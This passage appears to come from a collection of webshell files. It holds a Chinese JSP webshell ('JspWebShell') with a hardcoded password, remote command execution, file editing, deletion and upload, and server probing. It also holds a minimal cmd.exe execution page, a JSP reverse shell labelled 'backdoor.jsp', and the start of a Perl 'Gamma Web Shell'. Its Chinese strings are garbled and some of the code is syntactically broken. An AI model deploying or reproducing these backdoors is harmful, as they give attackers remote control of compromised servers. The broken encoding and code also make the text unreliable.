path=config.getServletContext().getRealPath("/");
%>
<%!
String _password ="111";//<2F><><EFBFBD><EFBFBD>
public String readAllFile(String filePathName) throws IOException
{
FileReader fr = new FileReader(filePathName);
int count = fr.read();
String res="";
while(count != -1)
{
//System.out.print((char)count);
res=res+(char)count;
count = fr.read();
if(count == 13)
{
fr.skip(1);
}
}
fr.close();
return res;
}
public void writeFile(String filePathName,String args) throws IOException
{
FileWriter fw = new FileWriter(filePathName);
PrintWriter out=new PrintWriter(fw);
out.write(args);
out.println();
out.flush();
fw.close();
out.close();
}
public boolean createFile(String filePathName) throws IOException
{
boolean result = false;
File file = new File(filePathName);
if(file.exists())
{
System.out.println("<22>ļ<EFBFBD><C4BC>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD>ڣ<EFBFBD>");
}
else
{
file.createNewFile();
result = true;
System.out.println("<22>ļ<EFBFBD><C4BC>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>");
}
return result;
}
public boolean createFolder(String fileFolderName)
{
boolean result = false;
try
{
File file = new File(fileFolderName);
if(file.exists())
{
//file.delete();
System.out.println("Ŀ¼<C4BF>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD><EFBFBD>!");
result = true;
}
else
{
file.mkdir();
System.out.println("Ŀ¼<C4BF>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD><EFBFBD>!");
result = true;
}
}
catch(Exception ex)
{
result = false;
System.out.println("CreateAndDeleteFolder is error:"+ex);
}
return result;
}
public boolean DeleteFolder(String filefolderName)
{
boolean result = false;
try
{
File file = new File(filefolderName);
if(file.exists())
{
file.delete();
System.out.println("Ŀ¼<C4BF><C2BC>ɾ<EFBFBD><C9BE>!");
result = true;
}
}
catch(Exception ex)
{
result = false;
System.out.println("CreateAndDeleteFolder is error:"+ex);
}
return result;
}
public boolean validate(String password) {
if (password.equals(_password)) {
return true;
} else {
return false;
}
}
public String HTMLEncode(String str) {
str = str.replaceAll(" ", "&nbsp;");
str = str.replaceAll("<", "&lt;");
str = str.replaceAll(">", "&gt;");
str = str.replaceAll("\r\n", "<br>");
return str;
}
public String exeCmd(String cmd) {
Runtime runtime = Runtime.getRuntime();
Process proc = null;
String retStr = "";
InputStreamReader insReader = null;
char[] tmpBuffer = new char[1024];
int nRet = 0;
try {
proc = runtime.exec(cmd);
insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
retStr += new String(tmpBuffer, 0, nRet);
}
insReader.close();
retStr = HTMLEncode(retStr);
} catch (Exception e) {
retStr = "<font color=\"red\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>\"" + cmd + "\"";
} finally {
return retStr;
}
}
public boolean fileCopy(String srcPath, String dstPath) {
boolean bRet = true;
try {
FileInputStream in = new FileInputStream(new File(srcPath));
FileOutputStream out = new FileOutputStream(new File(dstPath));
byte[] buffer = new byte[1024];
int nBytes;
while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
out.write(buffer, 0, nBytes);
}
in.close();
out.close();
} catch (IOException e) {
bRet = false;
}
return bRet;
}
class EnvServlet
{
public long timeUse=0;
public Hashtable htParam=new Hashtable();
private Hashtable htShowMsg=new Hashtable();
public void setHashtable()
{
Properties me=System.getProperties();
Enumeration em=me.propertyNames();
while(em.hasMoreElements())
{
String strKey=(String)em.nextElement();
String strValue=me.getProperty(strKey);
htParam.put(strKey,strValue);
}
}
public void getHashtable(String strQuery)
{
Enumeration em=htParam.keys();
while(em.hasMoreElements())
{
String strKey=(String)em.nextElement();
String strValue=new String();
if(strKey.indexOf(strQuery,0)>=0)
{
strValue=(String)htParam.get(strKey);
htShowMsg.put(strKey,strValue);
}
}
}
public String queryHashtable(String strKey)
{
strKey=(String)htParam.get(strKey);
return strKey;
}
/* public long test_int()
{
long timeStart = System.currentTimeMillis();
int i=0;
while(i<3000000)i++;
long timeEnd = System.currentTimeMillis();
long timeUse=timeEnd-timeStart;
return timeUse;
}
public long test_sqrt()
{
long timeStart = System.currentTimeMillis();
int i=0;
double db=(double)new Random().nextInt(1000);
while(i<200000){db=Math.sqrt(db);i++;}
long timeEnd = System.currentTimeMillis();
long timeUse=timeEnd-timeStart;
return timeUse;
}*/
}
%>
<%
EnvServlet env=new EnvServlet();
env.setHashtable();
//String action=new String(" ");
//String act=new String("action");
//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>JspWebShell By <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></title>
<style>
body {
font-size: 12px;
font-family: "<22><><EFBFBD><EFBFBD>";
background-color: #666666;
}
A {
COLOR: black; TEXT-DECORATION: none
}
A:hover {
COLOR: black; TEXT-DECORATION: underline; none:
}
td {
font-size: 12px;
font-family: "<22><><EFBFBD><EFBFBD>";
color: #000000;
}
input.textbox {
border: black solid 1;
font-size: 12px;
height: 18px;
}
input.button {
font-size: 12px;
font-family: "<22><><EFBFBD><EFBFBD>";
border: black solid 1;
}
td.datarows {
font-size: 12px;
font-family: "<22><><EFBFBD><EFBFBD>";
height: 25px;
color: #000000;
}
.PicBar { background-color: #f58200; border: 1px solid #000000; height: 12px;}
textarea {
border: black solid 1;
}
.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
.table1 {BORDER:gray 0px ridge;}
.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
.tr1 {BACKGROUND-color:gray }
</style>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
</head>
<body bgcolor="#666666">
<%
//session.setMaxInactiveInterval(_sessionOutTime * 60);
String password=request.getParameter("password");
if (password == null && session.getAttribute("password") == null) {
%>
<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:4px;top:272px">
<TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
<tr>
<td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
<tr>
<TD align="left" bgcolor="#333333"><FONT face="webdings" color="#ffffff">&nbsp;8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>JspWebShell
version 1.2<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>¼ :::...</b></font></TD>
<TD align="right" bgcolor="#333333"><FONT color="#d2d8ec">Power By
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></FONT></TD>
</tr>
<form name="bctform" method="post">
<tr bgcolor="#999999">
<td height="30" colspan="2" align="center" class="td2">
<input name="password" type="password" class="textbox" id="Textbox" />
<input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" />
</td>
</tr>
</form>
</TABLE></td>
</tr>
</TABLE>
</div>
<%
} else {
if (session.getAttribute("password") == null) {
if (validate(password) == false) {
out.println("<div align=\"center\"><font color=\"red\"><li><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></font></div>");
out.close();
return;
}
session.setAttribute("password", password);
} else {
password = (String)session.getAttribute("password");
}
%>
<%
File tmpFile = null;
String delfile="";
String delfile1="";
String editpath="";
delfile1=request.getParameter("delfile");
editpath=request.getParameter("filepath");
if (delfile1!=null)
{delfile=new String(delfile1.getBytes("ISO8859_1"));
}
if ( delfile1!= null) {
// out.print(delfile);
tmpFile = new File(delfile);
if (! tmpFile.delete()) {
out.print( "<font color=\"red\">ɾ<><C9BE>ʧ<EFBFBD><CAA7></font><br>\n");
}
}
%>
<%String editfilecontent=null;
String editfilecontent1=request.getParameter("content");
// out.println(editfilecontent1);
//String save=request.getParameter("save");
if (editfilecontent1!=null)
{editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
// out.print(editfile);
//out.print(editfilecontent);
if (editfile!=null&editfilecontent!=null)
{try {writeFile(editfile,editfilecontent);}
catch (Exception e) {out.print("д<><D0B4>ʧ<EFBFBD><CAA7>");}
out.print("д<><D0B4><EFBFBD>ɹ<EFBFBD>");
}
%>
<%request.setCharacterEncoding("GBK");%>
<%//String editfile=request.getParameter("editfile");
//out.print(editfile);
if (request.getParameter("jsptz")!=null)
{%>
<div id="Layer2" style="position:absolute; left:9px; top:340px; width:725px; height:59px; z-index:2">
<CENTER>
<table border="0" cellpadding="0" cellspacing="1" class="tableBorder">
<tr>
<td height="22" align="center" bgcolor="#000000" ><font color=#FFFFFF><strong><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ز<EFBFBD><D8B2><EFBFBD></strong></font>
</td>
</tr>
<tr>
<td style="display" id='submenu0'><table border=0 width=100% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#999999" height="22">
<td width="130" bgcolor="#999999">&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td height="22" colspan="3">&nbsp;<%= request.getServerName() %>(<%=request.getRemoteAddr()%>)</td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳ</td>
<td colspan="3">&nbsp;<%=env.queryHashtable("os.name")%> <%=env.queryHashtable("os.version")%>
<%=env.queryHashtable("sun.os.patch.level")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳ<CFB5><CDB3><EFBFBD><EFBFBD></td>
<td>&nbsp;<%=env.queryHashtable("os.arch")%></td>
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳģʽ</td>
<td>&nbsp;<%=env.queryHashtable("sun.arch.data.model")%>λ</td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڵ<EFBFBD><DAB5><EFBFBD></td>
<td>&nbsp;<%=env.queryHashtable("user.country")%></td>
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td>&nbsp;<%=env.queryHashtable("user.language")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1></td>
<td>&nbsp;<%=env.queryHashtable("user.timezone")%></td>
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1></td>
<td>&nbsp;<%=new java.util.Date()%> </td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td width="170">&nbsp;<%= getServletContext().getServerInfo() %></td>
<td width="130">&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˿<EFBFBD></td>
<td width="170">&nbsp;<%= request.getServerPort() %></td>
</tr>
<tr bgcolor="#999999" height="22">
<td height="22">&nbsp;<3B><>ǰ<EFBFBD>û<EFBFBD></td>
<td height="22" colspan="3">&nbsp;<%=env.queryHashtable("user.name")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;<3B>û<EFBFBD>Ŀ¼</td>
<td colspan="3">&nbsp;<%=env.queryHashtable("user.dir")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td align=left>&nbsp;<3B><><EFBFBD>ļ<EFBFBD>ʵ<EFBFBD><CAB5>·<EFBFBD><C2B7></td>
<td height="8" colspan="3">&nbsp;<%=request.getRealPath(request.getServletPath())%></td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<table width="640" border="0" cellpadding="0" cellspacing="1" class="tableBorder">
<tr>
<td width="454" height="22" align="center" bgcolor="#000000" onclick="showsubmenu(1)"><font color=#FFFFFF><strong>JAVA<56><41><EFBFBD>ز<EFBFBD><D8B2><EFBFBD></strong></font>
</td>
</tr>
<tr>
<td style="display" id='submenu1'>
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#666666" height="22">
<td width="30%">&nbsp;<3B><><EFBFBD><EFBFBD></td>
<td width="50%" height="22">&nbsp;Ӣ<><D3A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td width="20%" height="22">&nbsp;<3B>汾</td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA<56><41><EFBFBD>л<EFBFBD><D0BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA<56><41><EFBFBD>л<EFBFBD><D0BB><EFBFBD>˵<EFBFBD><CBB5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.specification.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.specification.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA<56><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA<56><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˵<EFBFBD><CBB5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.version")%></td>
</tr>
<%
float fFreeMemory=(float)Runtime.getRuntime().freeMemory();
float fTotalMemory=(float)Runtime.getRuntime().totalMemory();
float fPercent=fFreeMemory/fTotalMemory*100;
%>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td height="22">&nbsp;JAVA<56><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʣ<EFBFBD><CAA3><EFBFBD>ڴ棺</td>
<td height="22" colspan="2"><img width='8' height="12" align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fFreeMemory/1024/1024%>M
</td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td height="22">&nbsp;JAVA<56><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD></td>
<td height="22" colspan="2"><img width='85%' align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fTotalMemory/1024/1024%>M
</td>
</tr>
</table>
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#666666" height="22">
<td width="30%">&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td width="70%" height="22">&nbsp;<3B><><EFBFBD><EFBFBD>·<EFBFBD><C2B7></td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.class.path </td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.class.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>
</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.home</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.home")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.endorsed.dirs</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.endorsed.dirs")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.library.path</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.library.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>
</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.io.tmpdir</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.io.tmpdir")%></td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<div id="testspeed" align="center"> </div>
</CENTER></div>
<%}
else{
if (editfile!=null)//if edit
{
%>
<div id="Layer1" style="position:absolute; left:-17px; top:1029px; width:757px; height:250px; z-index:1">
<table width="99%" height="232" border="0">
<tr>
<td height="226"><form name="form2" method="post" action="">
<p align="center"> <20><>ַ<EFBFBD><D6B7>
<input name="editfile" type="text" value="<%=editfile%>" size="50">
</p>
<p align="center">
<textarea name="content" cols="105" rows="30"><%=readAllFile(editfile)%></textarea>
<input type="submit" name="Submit2" value="<22><><EFBFBD><EFBFBD>">
</p>
</form> </td>
</tr>
</table>
<p>&nbsp;</p></div>
<%}
else{%>
<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#ffffff" align="center" cellspacing="0">
<tr bgcolor="#333333">
<td colspan="4" align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff">JspWebShell
version 1.0</font><font color="#FFFFFF">(<28><>վĿ¼:<%=config.getServletContext().getRealPath("/")%>)</font></td>
</tr>
<tr bgcolor="#999999">
<td colspan="4"> <font color="#000000">
<%
File[] fs = File.listRoots();
for (int i = 0; i < fs.length; i++){
%>
<a href="<%=selfName %>?path=<%=fs[i].getPath()%>\"><3E><><EFBFBD>ش<EFBFBD><D8B4><EFBFBD>(<%=fs[i].getPath()%>)
</a>
<%}%>
</font></td>
</tr>
<tr bgcolor="#999999">
<td height="10" colspan="4"> <font color="#000000">
<form name="form1" method="post" action="">
<input type="text" name="command" class="button">
<input type="submit" name="Submit" value="CMD<4D><44><EFBFBD><EFBFBD>ִ<EFBFBD><D6B4>" class="button">
</form>
</font> <p>
<%
String cmd = "";
InputStream ins = null;
String result = "";
if (request.getParameter("command") != null) {
cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
<%=result == "" ? "&nbsp;" : result%>
<%}%>
</td>
</tr>
<FORM METHOD="POST" ACTION="?up=true&path=<%String path1=config.getServletContext().getRealPath("/"); String tempfilepath=request.getParameter("path"); if(tempfilepath!=null) path1=tempfilepath;path1=path1.replaceAll("\\\\", "\\\\\\\\"); %><%=path1%>" ENCTYPE="multipart/form-data">
<tr bgcolor="#999999">
<td colspan="2"> <INPUT TYPE="FILE" NAME="FILE1" style="width:150" SIZE="50" class="button">
<INPUT TYPE="SUBMIT" VALUE="<22>ϴ<EFBFBD>" class="button"> </td>
<td colspan="2"><a href="?jsptz=true" target="_blank">JSP̽<50><CCBD></a> </td>
</tr>
</FORM>
<% String fileexe="";
String dir="";
String deldir="";
String scrfile="";
String dstfile="";
fileexe=request.getParameter("fileexe");
dir=request.getParameter("dir");
deldir=request.getParameter("deldir");
scrfile=request.getParameter("scrfile");
dstfile=request.getParameter("dstfile");
if (fileexe!=null)
{
//out.print(path+fileexe);
createFile(path+fileexe);
}
if (dir!=null)
{
//out.print(path+dir);
createFolder(path+dir);
}
if (deldir!=null)
{
//out.print(deldir);
DeleteFolder(deldir);
}
if (scrfile!=null&dstfile!=null)
{
//out.print(scrfile);
//out.print(dstfile);
copyfinish=fileCopy(scrfile, dstfile) ;
}
%>
<tr bgcolor="#CCCCCC">
<td height="10" colspan="2" bgcolor="#999999"> <form name="form3" method="post" action="">
<20>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<input name="dir" type="text" size="10" class="button">
<input type="submit" name="Submit3" value="<22>½<EFBFBD>Ŀ¼" class="button">
</form></td>
<td width="188" height="10" bgcolor="#999999"> <form name="form4" method="post" action="">
<20>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
<input name="fileexe" type="text" size="8" class="button">
<input type="submit" name="Submit4" value="<22>½<EFBFBD><C2BD>ļ<EFBFBD>" class="button">
</form></td>
<td width="327" height="10" bgcolor="#999999"><form name="form5" method="post" action="">
<20>ļ<EFBFBD><input name="scrfile" type="text" size="15"class="button">
<20><><EFBFBD>Ƶ<EFBFBD>
<input name="dstfile" type="text" size="15" class="button">
<input type="submit" name="Submit5" value="<22><><EFBFBD><EFBFBD>" class="button">
</form><font color="#FF0000"><%if(copyfinish==true) out.print("<22><><EFBFBD>Ƴɹ<C6B3>");%></font></td>
</tr>
<%//<2F>ϴ<EFBFBD>
String tempfilename="";
String up=request.getParameter("up");
// String tempfilepath=request.getParameter("filepath");
// out.print(tempfilepath);
if(up!=null)
{
tempfilename=(String)session.getId();
//String tempfilename=request.getParameter("file");
File f1=new File(tempfilepath,tempfilename);
int n;
try
{
InputStream in=request.getInputStream();
BufferedInputStream my_in=new BufferedInputStream(in);
FileOutputStream fout=new FileOutputStream(f1);
BufferedOutputStream my_out=new BufferedOutputStream(fout);
byte[] b=new byte[10000];
while((n=my_in.read(b))!=-1)
{
my_out.write(b,0,n);
}
my_out.flush();
my_out.close();
fout.close();
my_in.close();
in.close();
// out.print("<22>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD>!<br>");
}
catch(IOException e)
{
out.print("<22>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>!");
}
try
{
RandomAccessFile random1=new RandomAccessFile(f1,"r");
random1.readLine();
String filename=random1.readLine();
byte[] b=filename.getBytes("ISO-8859-1");
filename=new String(b);
int pointer=filename.lastIndexOf('\\');
filename=filename.substring(pointer+1,filename.length()-1);
File f2=new File(tempfilepath,filename);
RandomAccessFile random2=new RandomAccessFile(f2,"rw");
random1.seek(0);
for(int i=1; i<=4; i++)
{
String tempstr=random1.readLine();
}
long startPoint=random1.getFilePointer();
random1.seek(random1.length());
long mark=random1.getFilePointer();
int j=0;
long endPoint=0;
while((mark>=0)&&(j<=5))
{
mark--;
random1.seek(mark);
n=random1.readByte();
if(n=='\n')
{
j++;
endPoint=random1.getFilePointer();
}
}
long length=endPoint-startPoint+1;
int order=(int)(length/10000);
int left=(int)(length%10000);
byte[] c=new byte[10000];
random1.seek(startPoint);
for(int i=0; i<order; i++)
{
random1.read(c);
random2.write(c);
}
random1.read(c,0,left);
random2.write(c,0,left);
random1.close();
random2.close();
f1.delete();
out.print("<22>ļ<EFBFBD><C4BC>ϴ<EFBFBD><CFB4>ɹ<EFBFBD>!");
}
catch(Exception e)
{
out.print("<22>ļ<EFBFBD><C4BC>ϴ<EFBFBD>ʧ<EFBFBD><CAA7>!");
}
}
%>
<tr>
<td width="196" height="48" valign="top" bgcolor="#999999">
<% try {
//path=request.getParameter("path");
//if(path==null)
//path=config.getServletContext().getRealPath("/");
File f=new File(path);
File[] fList= f.listFiles() ;
for (int j=0;j<fList.length;j++)
{
if (fList[j].isDirectory())
{%>
<a href="<%=selfName %>?path=<%=path%><%=fList[j].getName()%>\"> <%=fList[j].getName()%></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="?path=<%=path%>&deldir=<%=path%><%=fList[j].getName()%>">ɾ<><C9BE></a><br>
<% }
}//for
} catch (Exception e) {
System.out.println("<22><><EFBFBD><EFBFBD><EFBFBD>ڻ<EFBFBD>û<EFBFBD><C3BB>Ȩ<EFBFBD><C8A8>");
}
%>
&nbsp; </td>
<td colspan="3" valign="top" bgcolor="#999999">
<% try {
path=request.getParameter("path");
if(path==null)
path=config.getServletContext().getRealPath("/");
File f=new File(path);
File[] fList= f.listFiles() ;
for (int j=0;j<fList.length;j++)
{
if (fList[j].isFile())
{//request.getContextPath()<29>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7>%>
<%=fList[j].getName()%>
<a href="?path=<%String tempfilepath1=request.getParameter("path"); if(tempfilepath!=null) path=tempfilepath;%><%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank"><3E>༭</a>
&nbsp; <a href="?action=del&path=<%=path%>&delfile=<%=path%><%=fList[j].getName()%>">ɾ<><C9BE></a><br>
<% }
}//for
} catch (Exception e) {
System.out.println("<22><><EFBFBD><EFBFBD><EFBFBD>ڻ<EFBFBD>û<EFBFBD><C3BB>Ȩ<EFBFBD><C8A8>");
}
%>
</td>
</tr>
</table>
<p align="center">Power By <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[B.C.T] QQ:48124012</p>
<p align="center">&nbsp;</p>
<%}//if edit
}
}
%>
</body>
</html>

31
jsp/cmdjsp.jsp Normal file
View File

@@ -0,0 +1,31 @@
// note that linux = cmd and windows = "cmd.exe /c + cmd"
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>

90
jsp/jsp-reverse.jsp Normal file
View File

@@ -0,0 +1,90 @@
// backdoor.jsp
<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
% >
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">
IP Address
<input type="text" name="ipaddress" size=30>
Port
<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<hr>
<%
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
%>

869
pl/WebShell.cgi.pl Normal file
View File

@@ -0,0 +1,869 @@
#!/usr/bin/perl
###############################################################################
### Gamma Web Shell
### Copyright 2003 Gamma Group
### All rights reserved
###
### Gamma Web Shell is free for both commercial and non commercial
### use. You may modify this script as you find necessary as long
### as you do not sell it. Redistribution is not allowed without
### prior consent from Gamma Group (support@gammacenter.com).
###
### Gamma Group <http://www.gammacenter.com>
###
use strict;
###############################################################################
package WebShell::Configuration;
use vars qw($password $restricted_mode $ok_commands);
##
## Password.
## Set to blank if you don't need password protection.
##
$password = "changeme";
##
## Restricted mode.
## Set to "1" to allow only a limited set of commands.
##
$restricted_mode = 0;
##
## Available commands.
## The list of available commands for the restricted mode.
##
$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];
###############################################################################
package WebShell::Templates;
use vars qw($LOGIN_TEMPLATE $INPUT_TEMPLATE $EXECUTE_TEMPLATE $BROWSE_TEMPLATE);
my $VERSION = 'Gamma Web Shell 1.3';
my $STYLESHEET = <<EOT;
body {
font-family: Verdana, Helvetica, sans-serif;
font-size: 90%;
color: #000;
background: #FFF;
margin: 0px;
padding: 0px;
}
h1, h2, h3, h4, h5, h6 {
margin: 0.3em;
padding: 0px;
}
input, select, textarea, select {
font-family: Verdana, Helvetica, sans-serif;
font-size: 100%;
margin: 1px;
padding: 0px 1px;
}
pre, code, tt {
font-family: 'Courier New', Courier, monospace;
font-size: 100%;
}
form {
margin: 0px;
padding: 0px;
}
table {
font-size: 100%;
}
a {
text-decoration: none;
color: #000;
background: transparent;
}
a:hover {
text-decoration: underline;
}
.header, .footer {
color: #000;
background: #CCF;
margin: 0px;
padding: 0px;
text-align: center;
border: solid #000;
border-width: 1px 0px;
}
.box {
